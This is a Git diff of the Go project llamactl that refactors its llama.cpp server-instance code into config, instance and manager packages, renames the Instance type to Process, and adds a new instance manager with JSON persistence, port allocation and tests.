os.Setenv(tc.envVar, tc.envValue)
|
||||
defer os.Unsetenv(tc.envVar)
|
||||
|
||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -323,7 +334,7 @@ server:
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
cfg, err := llamactl.LoadConfig(configFile)
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -1,10 +1,12 @@
package llamactl
package instance

import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
@@ -21,7 +23,7 @@ type CreateInstanceOptions struct {
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`

LlamaServerOptions `json:",inline"`
llamacpp.LlamaServerOptions `json:",inline"`
}

// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
@@ -53,11 +55,11 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
return nil
}

// Instance represents a running instance of the llama server
type Instance struct {
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *InstancesConfig
globalSettings *config.InstancesConfig

// Status
Running bool `json:"running"`
@@ -121,7 +123,7 @@ func validateAndCopyOptions(name string, options *CreateInstanceOptions) *Create
}

// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
@@ -143,15 +145,15 @@ func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *Instanc
}

// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
logger := NewInstanceLogger(name, globalSettings.LogsDir)

return &Instance{
return &Process{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
@@ -163,13 +165,13 @@ func NewInstance(name string, globalSettings *InstancesConfig, options *CreateIn
}
}

func (i *Instance) GetOptions() *CreateInstanceOptions {
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}

func (i *Instance) SetOptions(options *CreateInstanceOptions) {
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()

@@ -188,7 +190,7 @@ func (i *Instance) SetOptions(options *CreateInstanceOptions) {
}

// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()

@@ -225,7 +227,7 @@ func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
}

// MarshalJSON implements json.Marshaler for Instance
func (i *Instance) MarshalJSON() ([]byte, error) {
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
@@ -235,22 +237,25 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
Created: i.Created,
}

return json.Marshal(temp)
}

// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Instance) UnmarshalJSON(data []byte) error {
func (i *Process) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{}

if err := json.Unmarshal(data, &temp); err != nil {
@@ -260,6 +265,7 @@ func (i *Instance) UnmarshalJSON(data []byte) error {
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
i.Created = temp.Created

// Handle options with validation but no defaults
if temp.Options != nil {
@@ -1,28 +1,30 @@
|
||||
package llamactl_test
|
||||
package instance_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/testutil"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestNewInstance(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
||||
@@ -53,8 +55,8 @@ func TestNewInstance(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
@@ -65,16 +67,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
maxRestarts := 10
|
||||
restartDelay := 15
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
AutoRestart: &autoRestart,
|
||||
MaxRestarts: &maxRestarts,
|
||||
RestartDelay: &restartDelay,
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
// Check that explicit values override defaults
|
||||
@@ -90,8 +92,8 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
@@ -101,15 +103,15 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
||||
invalidMaxRestarts := -5
|
||||
invalidRestartDelay := -10
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
MaxRestarts: &invalidMaxRestarts,
|
||||
RestartDelay: &invalidRestartDelay,
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
// Check that negative values were corrected to 0
|
||||
@@ -122,32 +124,32 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestSetOptions(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
initialOptions := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
initialOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
|
||||
inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
|
||||
|
||||
// Update options
|
||||
newOptions := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
newOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
instance.SetOptions(newOptions)
|
||||
opts := instance.GetOptions()
|
||||
inst.SetOptions(newOptions)
|
||||
opts := inst.GetOptions()
|
||||
|
||||
if opts.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
|
||||
@@ -163,20 +165,20 @@ func TestSetOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestSetOptions_NilOptions(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
originalOptions := instance.GetOptions()
|
||||
|
||||
// Try to set nil options
|
||||
@@ -190,21 +192,21 @@ func TestSetOptions_NilOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestGetProxy(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
inst := instance.NewInstance("test-instance", globalSettings, options)
|
||||
|
||||
// Get proxy for the first time
|
||||
proxy1, err := instance.GetProxy()
|
||||
proxy1, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("GetProxy failed: %v", err)
|
||||
}
|
||||
@@ -213,7 +215,7 @@ func TestGetProxy(t *testing.T) {
|
||||
}
|
||||
|
||||
// Get proxy again - should return cached version
|
||||
proxy2, err := instance.GetProxy()
|
||||
proxy2, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("GetProxy failed: %v", err)
|
||||
}
|
||||
@@ -223,21 +225,21 @@ func TestGetProxy(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestMarshalJSON(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
|
||||
data, err := json.Marshal(instance)
|
||||
if err != nil {
|
||||
@@ -284,20 +286,20 @@ func TestUnmarshalJSON(t *testing.T) {
|
||||
}
|
||||
}`
|
||||
|
||||
var instance llamactl.Instance
|
||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
||||
var inst instance.Process
|
||||
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
||||
if inst.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
|
||||
}
|
||||
if !instance.Running {
|
||||
if !inst.Running {
|
||||
t.Error("Expected running to be true")
|
||||
}
|
||||
|
||||
opts := instance.GetOptions()
|
||||
opts := inst.GetOptions()
|
||||
if opts == nil {
|
||||
t.Fatal("Expected options to be set")
|
||||
}
|
||||
@@ -324,13 +326,13 @@ func TestUnmarshalJSON_PartialOptions(t *testing.T) {
|
||||
}
|
||||
}`
|
||||
|
||||
var instance llamactl.Instance
|
||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
||||
var inst instance.Process
|
||||
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
opts := instance.GetOptions()
|
||||
opts := inst.GetOptions()
|
||||
if opts.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
|
||||
}
|
||||
@@ -348,20 +350,20 @@ func TestUnmarshalJSON_NoOptions(t *testing.T) {
|
||||
"running": false
|
||||
}`
|
||||
|
||||
var instance llamactl.Instance
|
||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
||||
var inst instance.Process
|
||||
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
||||
if inst.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
|
||||
}
|
||||
if instance.Running {
|
||||
if inst.Running {
|
||||
t.Error("Expected running to be false")
|
||||
}
|
||||
|
||||
opts := instance.GetOptions()
|
||||
opts := inst.GetOptions()
|
||||
if opts != nil {
|
||||
t.Error("Expected options to be nil when not provided in JSON")
|
||||
}
|
||||
@@ -384,42 +386,42 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "valid positive values",
|
||||
maxRestarts: intPtr(10),
|
||||
restartDelay: intPtr(30),
|
||||
maxRestarts: testutil.IntPtr(10),
|
||||
restartDelay: testutil.IntPtr(30),
|
||||
expectedMax: 10,
|
||||
expectedDelay: 30,
|
||||
},
|
||||
{
|
||||
name: "zero values",
|
||||
maxRestarts: intPtr(0),
|
||||
restartDelay: intPtr(0),
|
||||
maxRestarts: testutil.IntPtr(0),
|
||||
restartDelay: testutil.IntPtr(0),
|
||||
expectedMax: 0,
|
||||
expectedDelay: 0,
|
||||
},
|
||||
{
|
||||
name: "negative values should be corrected",
|
||||
maxRestarts: intPtr(-5),
|
||||
restartDelay: intPtr(-10),
|
||||
maxRestarts: testutil.IntPtr(-5),
|
||||
restartDelay: testutil.IntPtr(-10),
|
||||
expectedMax: 0,
|
||||
expectedDelay: 0,
|
||||
},
|
||||
}
|
||||
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
MaxRestarts: tt.maxRestarts,
|
||||
RestartDelay: tt.restartDelay,
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test", globalSettings, options)
|
||||
instance := instance.NewInstance("test", globalSettings, options)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
if tt.maxRestarts != nil {
|
||||
@@ -1,4 +1,4 @@
package llamactl
package instance

import (
"context"
@@ -11,7 +11,7 @@ import (
)

// Start starts the llama server instance and returns an error if it fails.
func (i *Instance) Start() error {
func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()

@@ -75,7 +75,7 @@ func (i *Instance) Start() error {
}

// Stop terminates the subprocess
func (i *Instance) Stop() error {
func (i *Process) Stop() error {
i.mu.Lock()

if !i.Running {
@@ -140,7 +140,7 @@ func (i *Instance) Stop() error {
return nil
}

func (i *Instance) monitorProcess() {
func (i *Process) monitorProcess() {
defer func() {
i.mu.Lock()
if i.monitorDone != nil {
@@ -181,7 +181,7 @@ func (i *Instance) monitorProcess() {
}

// handleRestart manages the restart process while holding the lock
func (i *Instance) handleRestart() {
func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
@@ -223,7 +223,7 @@ func (i *Instance) handleRestart() {
}

// validateRestartConditions checks if the instance should be restarted and returns the parameters
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
if i.options == nil {
log.Printf("Instance %s not restarting: options are nil", i.Name)
return false, 0, 0
@@ -1,4 +1,4 @@
package llamactl
package instance

import (
"bufio"
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
}

// GetLogs retrieves the last n lines of logs from the instance
func (i *Instance) GetLogs(num_lines int) (string, error) {
func (i *Process) GetLogs(num_lines int) (string, error) {
i.mu.RLock()
logFileName := i.logger.logFilePath
i.mu.RUnlock()
@@ -1,6 +1,6 @@
//go:build !windows

package llamactl
package instance

import (
"os/exec"
@@ -1,6 +1,6 @@
//go:build windows

package llamactl
package instance

import "os/exec"
222
pkg/manager/manager.go
Normal file
@@ -0,0 +1,222 @@
|
||||
package manager
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"log"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
)
|
||||
|
||||
// InstanceManager defines the interface for managing instances of the llama server.
|
||||
type InstanceManager interface {
|
||||
ListInstances() ([]*instance.Process, error)
|
||||
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
|
||||
GetInstance(name string) (*instance.Process, error)
|
||||
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
|
||||
DeleteInstance(name string) error
|
||||
StartInstance(name string) (*instance.Process, error)
|
||||
StopInstance(name string) (*instance.Process, error)
|
||||
RestartInstance(name string) (*instance.Process, error)
|
||||
GetInstanceLogs(name string) (string, error)
|
||||
Shutdown()
|
||||
}
|
||||
|
||||
type instanceManager struct {
|
||||
mu sync.RWMutex
|
||||
instances map[string]*instance.Process
|
||||
ports map[int]bool
|
||||
instancesConfig config.InstancesConfig
|
||||
}
|
||||
|
||||
// NewInstanceManager creates a new instance of InstanceManager.
|
||||
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
|
||||
im := &instanceManager{
|
||||
instances: make(map[string]*instance.Process),
|
||||
ports: make(map[int]bool),
|
||||
instancesConfig: instancesConfig,
|
||||
}
|
||||
|
||||
// Load existing instances from disk
|
||||
if err := im.loadInstances(); err != nil {
|
||||
log.Printf("Error loading instances: %v", err)
|
||||
}
|
||||
return im
|
||||
}
|
||||
|
||||
func (im *instanceManager) getNextAvailablePort() (int, error) {
|
||||
portRange := im.instancesConfig.PortRange
|
||||
|
||||
for port := portRange[0]; port <= portRange[1]; port++ {
|
||||
if !im.ports[port] {
|
||||
im.ports[port] = true
|
||||
return port, nil
|
||||
}
|
||||
}
|
||||
|
||||
return 0, fmt.Errorf("no available ports in the specified range")
|
||||
}
|
||||
|
||||
// persistInstance saves an instance to its JSON file
|
||||
func (im *instanceManager) persistInstance(instance *instance.Process) error {
|
||||
if im.instancesConfig.InstancesDir == "" {
|
||||
return nil // Persistence disabled
|
||||
}
|
||||
|
||||
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
|
||||
tempPath := instancePath + ".tmp"
|
||||
|
||||
// Serialize instance to JSON
|
||||
jsonData, err := json.MarshalIndent(instance, "", " ")
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
// Write to temporary file first
|
||||
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
|
||||
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
// Atomic rename
|
||||
if err := os.Rename(tempPath, instancePath); err != nil {
|
||||
os.Remove(tempPath) // Clean up temp file
|
||||
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (im *instanceManager) Shutdown() {
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(len(im.instances))
|
||||
|
||||
for name, inst := range im.instances {
|
||||
if !inst.Running {
|
||||
wg.Done() // If instance is not running, just mark it as done
|
||||
continue
|
||||
}
|
||||
|
||||
go func(name string, inst *instance.Process) {
|
||||
defer wg.Done()
|
||||
fmt.Printf("Stopping instance %s...\n", name)
|
||||
// Attempt to stop the instance gracefully
|
||||
if err := inst.Stop(); err != nil {
|
||||
fmt.Printf("Error stopping instance %s: %v\n", name, err)
|
||||
}
|
||||
}(name, inst)
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
fmt.Println("All instances stopped.")
|
||||
}
|
||||
|
||||
// loadInstances restores all instances from disk
|
||||
func (im *instanceManager) loadInstances() error {
|
||||
if im.instancesConfig.InstancesDir == "" {
|
||||
return nil // Persistence disabled
|
||||
}
|
||||
|
||||
// Check if instances directory exists
|
||||
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
|
||||
return nil // No instances directory, start fresh
|
||||
}
|
||||
|
||||
// Read all JSON files from instances directory
|
||||
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to read instances directory: %w", err)
|
||||
}
|
||||
|
||||
loadedCount := 0
|
||||
for _, file := range files {
|
||||
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
|
||||
continue
|
||||
}
|
||||
|
||||
instanceName := strings.TrimSuffix(file.Name(), ".json")
|
||||
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
|
||||
|
||||
if err := im.loadInstance(instanceName, instancePath); err != nil {
|
||||
log.Printf("Failed to load instance %s: %v", instanceName, err)
|
||||
continue
|
||||
}
|
||||
|
||||
loadedCount++
|
||||
}
|
||||
|
||||
if loadedCount > 0 {
|
||||
log.Printf("Loaded %d instances from persistence", loadedCount)
|
||||
// Auto-start instances that have auto-restart enabled
|
||||
go im.autoStartInstances()
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// loadInstance loads a single instance from its JSON file
|
||||
func (im *instanceManager) loadInstance(name, path string) error {
|
||||
data, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to read instance file: %w", err)
|
||||
}
|
||||
|
||||
var persistedInstance instance.Process
|
||||
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||
return fmt.Errorf("failed to unmarshal instance: %w", err)
|
||||
}
|
||||
|
||||
// Validate the instance name matches the filename
|
||||
if persistedInstance.Name != name {
|
||||
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
|
||||
}
|
||||
|
||||
// Create new inst using NewInstance (handles validation, defaults, setup)
|
||||
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
|
||||
|
||||
// Restore persisted fields that NewInstance doesn't set
|
||||
inst.Created = persistedInstance.Created
|
||||
inst.Running = persistedInstance.Running
|
||||
|
||||
// Check for port conflicts and add to maps
|
||||
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
|
||||
port := inst.GetOptions().Port
|
||||
if im.ports[port] {
|
||||
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
|
||||
}
|
||||
im.ports[port] = true
|
||||
}
|
||||
|
||||
im.instances[name] = inst
|
||||
return nil
|
||||
}
|
||||
|
||||
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
|
||||
func (im *instanceManager) autoStartInstances() {
|
||||
im.mu.RLock()
|
||||
var instancesToStart []*instance.Process
|
||||
for _, inst := range im.instances {
|
||||
if inst.Running && // Was running when persisted
|
||||
inst.GetOptions() != nil &&
|
||||
inst.GetOptions().AutoRestart != nil &&
|
||||
*inst.GetOptions().AutoRestart {
|
||||
instancesToStart = append(instancesToStart, inst)
|
||||
}
|
||||
}
|
||||
im.mu.RUnlock()
|
||||
|
||||
for _, inst := range instancesToStart {
|
||||
log.Printf("Auto-starting instance %s", inst.Name)
|
||||
// Reset running state before starting (since Start() expects stopped instance)
|
||||
inst.Running = false
|
||||
if err := inst.Start(); err != nil {
|
||||
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
|
||||
}
|
||||
}
|
892
pkg/manager/manager_test.go
Normal file
@@ -0,0 +1,892 @@
|
||||
package manager_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"reflect"
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestNewInstanceManager(t *testing.T) {
|
||||
cfg := config.InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogsDir: "/tmp/test",
|
||||
MaxInstances: 5,
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
manager := manager.NewInstanceManager(cfg)
|
||||
if manager == nil {
|
||||
t.Fatal("NewInstanceManager returned nil")
|
||||
}
|
||||
|
||||
// Test initial state
|
||||
instances, err := manager.ListInstances()
|
||||
if err != nil {
|
||||
t.Fatalf("ListInstances failed: %v", err)
|
||||
}
|
||||
if len(instances) != 0 {
|
||||
t.Errorf("Expected empty instance list, got %d instances", len(instances))
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
inst, err := manager.CreateInstance("test-instance", options)
|
||||
if err != nil {
|
||||
t.Fatalf("CreateInstance failed: %v", err)
|
||||
}
|
||||
|
||||
if inst.Name != "test-instance" {
|
||||
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
|
||||
}
|
||||
if inst.Running {
|
||||
t.Error("New instance should not be running")
|
||||
}
|
||||
if inst.GetOptions().Port != 8080 {
|
||||
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCreateInstance_DuplicateName(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options1 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
options2 := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
// Create first instance
|
||||
_, err := manager.CreateInstance("test-instance", options1)
|
||||
if err != nil {
|
||||
